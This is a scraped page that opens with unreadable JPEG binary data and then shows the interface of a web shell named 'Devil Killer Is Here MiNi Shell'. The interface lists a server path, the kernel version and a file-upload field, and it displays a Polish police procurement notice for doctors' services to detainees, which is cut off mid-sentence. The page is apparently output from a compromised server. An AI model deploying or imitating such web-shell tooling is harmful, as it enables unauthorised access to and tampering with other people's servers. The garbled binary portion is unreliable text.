JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/0022085701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b467f870-3a32-4bfc-8952-5d6440c55b67</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00220857</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00116509/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.5 Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c) Zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;d) Włączona obsługa JavaScript;e) Zainstalowany program<br/>Acrobat Reader lub inny obsługujący pliki w formacie .pdf.f) Dopuszczalny format przesyłanych danych tj. plików o wielkości do 50<br/>MB w formatach: .pdfg) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie zaszyfrowany.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.h)<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. Poniżej została określona instrukcja<br/>korzystania z Platformy, tj.: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu<br/>danych<br/>użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system. b) w zakładce „Postępowania”,<br/>„Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś się do udziału w<br/>postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na Platformie lub panelu<br/>logowania użytkownika do Systemu.<br/>c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że może dokonać pierwszego logowania<br/>do Platformy.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z https://slaskapolicja.<br/>eb2b.com.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>ustawy. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).b) W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z Zaleca się, aby komunikacja<br/>z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza Pytania/Informacje”, nie za pośrednictwem adresu<br/>email.<br/>Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telefonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail: helpdesk@eb2b.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1, ze zm.), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych osobowych jest Komendant<br/>Wojewódzki Policji w Katowicach z siedzibą w Katowicach przy ul. Lompy 19. Może się Pani/Pan kontaktować z nim w następujący<br/>sposób - listownie na adres: ul. Lompy 19, 40-038 Katowice lub przez elektroniczną skrzynkę podawczą na stronie<br/>https://slaska.bip.policja.gov.pl;•w sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem<br/>Ochrony Danych, w następujący sposób - listownie na adres: ul. Lompy 19, 40-038 Katowice lub za pośrednictwem poczty<br/>elektronicznej pod adresem: iod.kwp@ka.policja.gov.pl; • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.<br/>c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o<br/>udzielenie zamówienia publicznego i jego archiwizacji; Pełna treść klauzuli informacyjnej znajduje się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-214/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 4245257,45 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 309378,05 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 – Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na terenie działania KMP w Jaworznie.<br/>Przedmiotem zamówienia jest całodobowe świadczenie usług lekarskich wobec osób doprowadzanych przez funkcjonariuszy do miejsca wykonywania badań, w tym:<br/>Wykonanie badania lekarskiego osoby doprowadzonej przez Policję do miejsca wykonywania badań.<br/>W przypadku konieczności, w ramach przeprowadzonego badania wystawienie zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym , a także (w przypadkach koniecznych) opatrzenie ran i wystawienie recepty na niezbędne leki oraz określenie ich dawkowania;<br/>Pobrania krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz sporządzenia protokołu pobrania krwi. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>Pobrania innego materiału biologicznego (np. ślina, mocz, włosy, wyskrobiny spod paznokci) bez badań analitycznych oraz sporządzenie protokołu z tego pobrania. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>W sytuacji gdy wyniknie konieczność, przeprowadzenie badania osoby doprowadzonej do miejsca wykonywania badań przez lekarza specjalistę tj.: wykonanie innego badania niż opisane w pkt. 1, w tym przeprowadzenie takiego badania w zakresie niezbędnym do wydania zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do umieszczenia osoby badanej w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia Zamawiający opisał w:<br/>Załączniku nr 1 do SWZ – Formularzu ofertowym;<br/>Załączniku nr 2 do SWZ – Projektowanych postanowieniach umowy;<br/>Załączniku nr 3 do SWZ – Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami o odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/> a) Cena oferty – 70 %, co stanowi 70 pkt<br/> b) Odległość od KPP/KMP – 30%, co stanowi 30 pkt<br/><br/>2. Ocena oferty<br/>Y = A+B<br/>gdzie:<br/>Y – Suma punktów badanej ważnej oferty<br/>A– cena oferty – 70 pkt<br/>B – odległość od KPP/KMP – 30 pkt,<br/>co daje łącznie 100 pkt<br/><br/>2.1 Punktacja dla kryterium A - cena będzie liczona zgodnie z poniższym wzorem<br/><br/>A (ilość punktów)=Najniższa oferowana cena brutto z ważnych ofert / Cena brutto badanej oferty x 70 pkt<br/><br/>Wyznaczenie wartości punktów:<br/>a) Ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj.: 70 pkt<br/>b) Inne ważne oferty z podaną ceną zostaną przeliczone wg powyższego wzoru.<br/><br/>2.2. Punktacja dla kryterium B – odległość od KPP/KMP będzie przydzielona zgodnie z poniższym podziałem dla każdej oferty niepodlegającej odrzuceniu:<br/>0,00 – 14,99 km – 30 pkt<br/>15,00 – 19,99 km – 20 pkt<br/>20,00 – 34,99 km – 10 pkt<br/>35,00 – 44,99 km – 5 pkt<br/>45,00 – 58,00 km – 0 pkt.<br/><br/>Wyznaczenie wartości punktów:<br/>a) każda ważna oferta otrzyma ilość punktów wynikającą z powyższego podziału.<br/>b) Zamawiający dokona wyliczenia odległości Zakładu Opieki Zdrowotnej od siedziby jednostki Policji w oparciu o wyznaczenie najkrótszej trasy przy użyciu Google Maps dla pojazdów samochodowych.<br/>c) maksymalna odległość Zakładu Opieki Zdrowotnej od jednostki Policji jaką dopuszcza Zamawiający wynosi 58 km. Stwierdzenie przez Zamawiającego odległości ZOZ od siedziby KMP/KPP większej niż 58 km skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia. Maksymalna odległość może być większa tylko w przypadku, gdy Zakład Opieki Zdrowotnej zlokalizowany jest w granicach administracyjnych jednostek. W takim przypadku dla kryterium B zostanie przydzielonych 0 pkt.<br/>d) Brak wskazania w formularzu ofertowym adresu miejsca świadczenia usług skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>e) W przypadku wskazania przez Wykonawcę kilku punktów ZOZ/lokalizacji, odległość Zakładu Opieki Zdrowotnej od jednostki Policji zostanie wyliczona na podstawie średniej arytmetycznej odległości. Średnia arytmetyczna odległość podlegać będzie ocenie w myśl pkt b-d.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od KPP/KMP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na terenie działania KPP w Myszkowie<br/>Przedmiotem zamówienia jest całodobowe świadczenie usług lekarskich wobec osób doprowadzanych przez funkcjonariuszy do miejsca wykonywania badań, w tym:<br/>Wykonanie badania lekarskiego osoby doprowadzonej przez Policję do miejsca wykonywania badań.<br/>W przypadku konieczności, w ramach przeprowadzonego badania wystawienie zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym , a także (w przypadkach koniecznych) opatrzenie ran i wystawienie recepty na niezbędne leki oraz określenie ich dawkowania;<br/>Pobrania krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz sporządzenia protokołu pobrania krwi. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>Pobrania innego materiału biologicznego (np. ślina, mocz, włosy, wyskrobiny spod paznokci) bez badań analitycznych oraz sporządzenie protokołu z tego pobrania. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>W sytuacji gdy wyniknie konieczność, przeprowadzenie badania osoby doprowadzonej do miejsca wykonywania badań przez lekarza specjalistę tj.: wykonanie innego badania niż opisane w pkt. 1, w tym przeprowadzenie takiego badania w zakresie niezbędnym do wydania zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do umieszczenia osoby badanej w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia Zamawiający opisał w:<br/>Załączniku nr 1 do SWZ – Formularzu ofertowym;<br/>Załączniku nr 2 do SWZ – Projektowanych postanowieniach umowy;<br/>Załączniku nr 3 do SWZ – Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami o odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/> a) Cena oferty – 70 %, co stanowi 70 pkt<br/> b) Odległość od KPP/KMP – 30%, co stanowi 30 pkt<br/><br/>2. Ocena oferty<br/>Y = A+B<br/>gdzie:<br/>Y – Suma punktów badanej ważnej oferty<br/>A– cena oferty – 70 pkt<br/>B – odległość od KPP/KMP – 30 pkt,<br/>co daje łącznie 100 pkt<br/><br/>2.1 Punktacja dla kryterium A - cena będzie liczona zgodnie z poniższym wzorem<br/><br/>A (ilość punktów)=Najniższa oferowana cena brutto z ważnych ofert / Cena brutto badanej oferty x 70 pkt<br/><br/>Wyznaczenie wartości punktów:<br/>a) Ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj.: 70 pkt<br/>b) Inne ważne oferty z podaną ceną zostaną przeliczone wg powyższego wzoru.<br/><br/>2.2. Punktacja dla kryterium B – odległość od KPP/KMP będzie przydzielona zgodnie z poniższym podziałem dla każdej oferty niepodlegającej odrzuceniu:<br/>0,00 – 14,99 km – 30 pkt<br/>15,00 – 19,99 km – 20 pkt<br/>20,00 – 34,99 km – 10 pkt<br/>35,00 – 44,99 km – 5 pkt<br/>45,00 – 58,00 km – 0 pkt.<br/><br/>Wyznaczenie wartości punktów:<br/>a) każda ważna oferta otrzyma ilość punktów wynikającą z powyższego podziału.<br/>b) Zamawiający dokona wyliczenia odległości Zakładu Opieki Zdrowotnej od siedziby jednostki Policji w oparciu o wyznaczenie najkrótszej trasy przy użyciu Google Maps dla pojazdów samochodowych.<br/>c) maksymalna odległość Zakładu Opieki Zdrowotnej od jednostki Policji 